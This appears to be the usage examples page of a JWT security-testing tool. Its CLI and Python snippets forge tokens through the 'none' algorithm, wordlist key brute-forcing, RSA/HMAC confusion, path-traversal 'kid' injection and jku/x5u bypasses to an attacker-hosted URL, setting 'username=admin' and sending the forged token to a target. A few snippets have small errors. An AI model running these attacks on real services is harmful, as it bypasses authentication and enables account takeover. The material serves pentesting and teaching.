Examples

Modify your Jwt

CLI

myjwt YOUR_JWT --add-payload "username=admin" --add-header "refresh=false"

Code

from myjwt.modify_jwt import add_header, change_payload
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt

jwt_json = jwt_to_json(jwt)
jwt_json = add_header(jwt_json, {"kid": "001"})
jwt_json = change_payload(jwt_json, {"username": "admin"})
jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]

Full example here: 01-modify-jwt

None Vulnerability

CLI

myjwt YOUR_JWT --none-vulnerability

CODE

from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt
from myjwt.vulnerabilities import none_vulnerability
jwt_json = jwt_to_json(jwt)
jwt = none_vulnerability(encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE])

Full example here: 02-none-vulnerability

Sign Key

CLI

myjwt YOUR_JWT --sign YOUR_KEY

CODE

from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
key = "test"
jwt = signature(jwt_to_json(jwt), key)

Full example here: 03-sign-key

Brute Force

CLI

myjwt YOUR_JWT --bruteforce PATH

CODE

from myjwt.vulnerabilities import bruteforce_wordlist
wordlist = "../../wordlist/common_pass.txt"
key = bruteforce_wordlist(jwt, wordlist)

Full example here: 04-brute-force

Crack

CLI

myjwt YOUR_JWT --crack REGEX

RSA/HMAC Confusion

CLI

myjwt YOUR_JWT --hmac FILE

CODE

from myjwt.vulnerabilities import confusion_rsa_hmac
file = "public.pem"
jwt = confusion_rsa_hmac(jwt, file)

Full example here: 05-rsa-hmac-confusion

Kid Injection

CLI

myjwt YOUR_JWT --kid INJECTION

Code

from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
from myjwt.vulnerabilities import inject_sql_kid

injection = "../../../../../../dev/null"
sign = ""
jwt = inject_sql_kid(jwt, injection)
jwt = signature(jwt_to_json(jwt), sign)

Full example here: 06-kid-injection

Send your new Jwt to url

CLI

myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --non-vulnerability --add-payload "username=admin"

Jku Vulnerability

CLI

myjwt YOUR_JWT --jku YOUR_URL

Code

from myjwt.vulnerabilities import jku_vulnerability
new_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(jwt)

Full example here: 07-jku-bypass

X5U Vulnerability

CLI

myjwt YOUR_JWT --x5u YOUR_URL

Code

from myjwt.vulnerabilities import x5u_vulnerability
newJwt = x5u_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(jwt)

Full example here: 08-x5u-bypass